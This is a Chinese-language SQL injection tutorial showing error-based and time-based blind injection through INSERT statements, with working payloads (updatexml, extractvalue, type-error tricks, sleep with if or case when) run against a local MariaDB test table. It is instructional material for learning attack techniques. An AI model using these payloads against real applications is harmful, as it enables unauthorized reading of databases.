[sql 注入] insert 报错注入与延时盲注
insert注入的技巧在于如何在一个字段值内构造闭合。
insert 报错注入
演示案例所用的表:
MariaDB [mysql]> desc test;
+--------+----------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+--------+----------+------+-----+---------+-------+
| id | int(10) | YES | | NULL | |
| uname | char(10) | YES | | NULL | |
| passwd | char(10) | YES | | NULL | |
+--------+----------+------+-----+---------+-------+
0x01: insert数字型报错注入
MariaDB [mysql]> insert into test values(1 and updatexml(1,concat(0x7e,database(),0x7e),1),'2','3');
ERROR 1105 (HY000): XPATH syntax error: '~mysql~'
0x02: insert字符型报错注入
提示:字符型的关键在于如何在一个字段值内构造闭合。
MariaDB [mysql]> insert into test values(1,'2' and updatexml(1,concat(0x7e,database(),0x7e),1) and '','3');
ERROR 1105 (HY000): XPATH syntax error: '~mysql~'
0x03: 用extractvalue代替updatexml
MariaDB [mysql]> insert into test values(1,'2' and extractvalue(1,concat(0x7e,database())) and '','3');
ERROR 1105 (HY000): XPATH syntax error: '~mysql'
0x04: 使用按位运算符制造insert数字型报错注入
产生报错是因为1和(select database())的值做按位运算,但是字符不能做按位运算,所以会报错提示哪个值类型错误。"& , | , ^"运算同理。
MariaDB [mysql]> insert into test values(1 ^ (select database()),'2','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'
MariaDB [mysql]> insert into test values(1 | (select database()),'2','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'
MariaDB [mysql]> insert into test values(1 & (select database()),'2','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'
0x05: 使用按位运算符制造insert字符型报错注入
insert into test values(1,'1' & (select database()) & '','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'
0x06: 使用算术运算符制造insert报错注入(+,-,%,/),灵活运用按位运算符,逻辑运算符,算术运算符。
MariaDB [mysql]> insert into test values(1,'1' + (select database()) & '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'
MariaDB [mysql]> insert into test values(1,'1' - (select database()) and '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'
MariaDB [mysql]> insert into test values(1,'1' / (select database()) or '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'
MariaDB [mysql]> insert into test values(1,'1' % (select database()) & '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'
MariaDB [mysql]> insert into test values(1,'1' % (select database()) | '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'
MariaDB [mysql]> insert into test values(1,'1' % (select database()) / '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'
insert延时盲注
在学习延时盲注之前你需要具备sql(sleep(),if(),substr(),ascii(),case when)的用法。
0x07: 一个简单示例
原始正常语句:
MariaDB [mysql]> insert into test values(1,('2'),'3');
Query OK, 1 row affected (0.005 sec)
MariaDB [mysql]> insert into test values(1,('1') and sleep(3) and (''),'3');
Query OK, 1 row affected, 1 warning (3.002 sec)
0x08: 猜测当前所在库的名称长度,如果数据库长度等于5则延时3秒输出内容。
MariaDB [mysql]> insert into test values(1,('1') and sleep(if((select length(database()))=5,3,0)) and (''),'3');
Query OK, 1 row affected, 1 warning (3.007 sec)
0x09: 猜测当前库的第一个表名的第一个字符的ascii码。慢慢去理解,慢就是快。
实际的值:
MariaDB [mysql]> select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1));
+---------------------------------------------------------------------------------------------------------------+
| ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) |
+---------------------------------------------------------------------------------------------------------------+
| 112 |
+---------------------------------------------------------------------------------------------------------------+
1 row in set (0.000 sec)
insert盲注如下所示:
MariaDB [mysql]> insert into test values(1,('1') and sleep(if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=112,3,0)) and (''),'3');
Query OK, 1 row affected, 1 warning (3.005 sec)
0x10: 用case then代替if():
MariaDB [mysql]> insert into test values(1,('2') and case when (select length(database())) = 5 then sleep(2) else 0 end and (''),'3');
Query OK, 1 row affected, 1 warning (2.002 sec)
MariaDB [mysql]> insert into test values(1,('2') and case when ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) = 112 then sleep(2) else 0 end and (''),'3');
Query OK, 1 row affected, 1 warning (2.004 sec)
